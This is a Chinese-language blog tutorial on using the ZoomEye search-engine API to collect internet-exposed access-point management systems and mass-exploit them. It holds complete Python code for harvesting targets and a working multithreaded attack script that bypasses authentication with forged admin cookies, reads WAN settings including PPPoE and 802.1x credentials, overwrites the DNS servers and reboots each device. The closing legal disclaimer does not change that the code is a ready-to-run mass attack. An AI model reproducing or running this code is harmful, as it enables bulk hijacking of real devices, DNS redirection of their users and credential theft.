前言
“zoomeye 是一个针对网络空间的搜索引擎”这是ZoomEye官方(知道创于安全实验室)给予的定义,其功能与shodan.io类似,但其各自的侧重点又有所不同。之前我写过一篇关于shodan的文章,传送门“使用shodan的api(Python)”,那时候ZoomEye的功能还相当简洁,经过2年的发展,其搜索深度以及数据量已经媲美shodan.io
场景
当你手上已经有某个设备的漏洞利用方法,但是无法找到大量的实际案例,这个时候结合ZoomEye就能快速检索出来实际存在的目标,编写自动化攻击脚本,就可以进行批量攻击测试。
实战
这里我使用一个实际案例进行说明ZoomEye的用法。开始之前我假定你已经注册账号并验证了邮箱,这些前期的工作是必备的,由于每个账号的初始限额为5000,每一次查询都将消耗额度,请慎重使用,当然,你依然可以注册N个账号,关于查询返回的结果上限是多少,请自行查看官网相关说明。
0x00
博主拿之前写过的一个漏洞进行测试,漏洞详情在这里,传送门“某AP管理系统权限绕过”,这个漏洞的利用方法比较简单,漏洞类型为权限绕过。开始之前先根据ZoomEye官方的API文档获取key,首先拿到Token,在所有的请求中必须带上Token才能完成请求,Python代码如下
def getAccessToken(): loginURL = 'https://api.zoomeye.org/user/login' user_data = json.dumps({"username": "xxx@gmail.com", "password": "xxxxxx"}) try: return json.loads(requests.post(url=loginURL, data=user_data).text)['access_token'] except Exception, e: print e
定义一个方法来获取Token方便使用,全局只需要执行一次即可。
拿到Token之后咱们先查询下当前账号的额度剩多少,没有额度的话去查询是不会返回结果的,所以再定义一个方法获取额度数量
def queryCount(): resourceURL = 'https://api.zoomeye.org/resources-info' try: zoomeyeResult = json.loads(requests.get(url=resourceURL, headers=HEADERS).text) return zoomeyeResult['resources']['host-search'], zoomeyeResult['resources']['web-search'] except Exception, e: print e
确定账号可用的情况下就可以继续进行查询操作了,这里需要注意的是在发出请求的时候必须带上headers,这个是官方文档规定的认证方式,比如我这里的代码是这样的
HEADERS = {"Authorization": "JWT " + getAccessToken()}
定义了全局的变量。
0x01
定义一个zoomeyeSearch方法进行检索,代码如下
def zoomeyeSearch(keyword): searchURL = 'https://api.zoomeye.org/host/search?query=' + keyword try: zoomeyeBase = requests.get(url=searchURL, headers=HEADERS).text pagecount = int(math.ceil(json.loads(zoomeyeBase)['total']/3/10.0)) urls = [] for page in range(1, pagecount + 1): urls.append('https://api.zoomeye.org/host/search?query=' + keyword + '&page=' + str(page)) MyThread(urls) except Exception, e: print e
这个方法里面需要传入检索的关键字,根据官方文档,这里返回结果是具有分页功能的,所以需要对返回的数量进行分页,普通账号只能得到所有结果的三分之一,上限一万条。这个方法只是为了得到检索的具体分页后的链接,然后把分页链接的数组传入获取数据的方法,当前还没有得到具体的数据。
咱们需要传入的关键字是“lighttpd/1.4.23 port:9000”,直接传入就好了。
0x02
为了增加检索的速度,我这里加上了多线程,这样速度就非常快了。
def MyThread(urllist): threads = [] queue = Queue.Queue() for host in urllist: queue.put(host) for x in xrange(0, 10): threads.append(tThread(queue)) for t in threads: t.start() for t in threads: t.join() # create thread class tThread(threading.Thread): def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def run(self): while not self.queue.empty(): url = self.queue.get() try: getDataByURL(url) except: continue
这里咱们看到多线程调用的方法为getDataByURL,这个方法就是根据传入的URL获取每一页的具体数据,代码如下
def getDataByURL(pageURL): try: zoomeyeResult = json.loads(requests.get(url=pageURL, headers=HEADERS).text) try: matches = zoomeyeResult['matches'] for item in matches: tempHost = 'http://' + item['ip'] + ':' + str(item['portinfo']['port']) SEARCHLIST.append(tempHost) print tempHost except: pass except Exception, e: print e然后把所有的结果数据存入到数据,最后把检索出来的IP信息写入到文本文件供自动化测试脚本使用,当然这里也可以直接调用自动化测试代码,为了方便,我还是写入到文本比较保险,以后还可以拿来用
with open(localPath, 'wb') as f: for host in SEARCHLIST: f.write(host + '\n') f.flush() f.close()
0x03
下面就是比较关键的攻击测试代码的部分,原理我在之前的文章中就提到了,不再讲原理,这里直接贴出来完整的攻击测试代码,这段代码实现了批量修改DNS地址效果,完整代码如下
#!/usr/bin/env python # coding=utf-8 # 92ez.com import threading import requests import Queue import json import sys reload(sys) sys.setdefaultencoding('utf8') def MyThread(iplist): threads = [] queue = Queue.Queue() for host in iplist: queue.put(host) for x in xrange(0, int(SETTHREAD)): threads.append(tThread(queue)) for t in threads: t.start() for t in threads: t.join() class tThread(threading.Thread): def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def run(self): while not self.queue.empty(): host = self.queue.get() try: setAPDNS(host + ':9000') except: continue def setAPDNS(host): print host url_base = host + "/wan.cgi" url_reboot = host + "/reboot.cgi" cookie = {"disabled_length": "0", "guide0": "wan", "guide1": "cloud", "guide2": "passwd", "guide3": "complete", "guide_length": "4", "locale": "cn", "salt": "YWRtaW4=", "username": "admin"} setParams = {} try: result_base = json.loads(requests.get(url=url_base, cookies=cookie, timeout=15).content) if len(result_base['data']['wan_mode']) > 0: if result_base['data']['wan_mode'] == 'STATIC': setParams = { "wan_mode": result_base['data']['wan_mode'], "ip": result_base['data']['wan_info']['ip'], "mask": result_base['data']['wan_info']['mask'], "gateway": result_base['data']['wan_info']['gateway'], "pri_dns": DNS1, "alt_dns": DNS2, "cfg1xclient_enable": result_base['data']['wan_info']['cfg1xclient_enable'], "cfg1xclient_username": result_base['data']['wan_info']['cfg1xclient_username'], "cfg1xclient_password": result_base['data']['wan_info']['cfg1xclient_password'], "vlan": result_base['data']['wan_info']['vlan'] } elif result_base['data']['wan_mode'] == 'PPPOE': setParams = { "wan_mode": result_base['data']['wan_mode'], "pppoe_password": result_base['data']['wan_info']['pppoe_password'], "pppoe_username": result_base['data']['wan_info']['pppoe_username'], "cfg1xclient_enable": result_base['data']['wan_info']['cfg1xclient_enable'], "cfg1xclient_username": result_base['data']['wan_info']['cfg1xclient_username'], "cfg1xclient_password": result_base['data']['wan_info']['cfg1xclient_password'], "pri_dns": DNS1, "alt_dns": DNS2 } else: setParams = { "wan_mode": result_base['data']['wan_mode'], "ip": result_base['data']['wan_info']['ip'], "mask": result_base['data']['wan_info']['mask'], "gateway": result_base['data']['wan_info']['gateway'], "cfg1xclient_enable": result_base['data']['wan_info']['cfg1xclient_enable'], "cfg1xclient_username": result_base['data']['wan_info']['cfg1xclient_username'], "cfg1xclient_password": result_base['data']['wan_info']['cfg1xclient_password'], "vlan": result_base['data']['wan_info']['vlan'], "pri_dns": DNS1, "alt_dns": DNS2 } setResult = json.loads(requests.post(url=url_base, cookies=cookie, data=setParams).content) if setResult['status'] == 'OK': rebootRes = json.loads(requests.post(url=url_reboot, cookies=cookie).text) if rebootRes['status'] == 'OK': print host + ' wan_mod: ' + result_base['data']['wan_mode'] +' SET DNS OK!' except Exception, e: pass if __name__ == '__main__': global SETTHREAD global DNS1 global DNS2 SETTHREAD = sys.argv[1] DNS1 = '114.114.114.114' DNS2 = '8.8.8.8' iplist = [] try: file = open(sys.path[0] + "/host.txt") for line in file: iplist.append(line.replace('\n', '')) file.close() MyThread(iplist) except Exception, e: print e代码也加入了多线程的效果。
0x04
具体截图就不放出来了,涉及到一些比较敏感的IP地址信息,本文只提供一个思路,读者测试请自觉遵循相关法律法规。
!!! 转载请先联系non3gov@gmail.com授权并在显著位置注明作者和原文链接 !!! 小黑屋
提示:技术文章有一定的时效性,请先确认是否适用你当前的系统环境。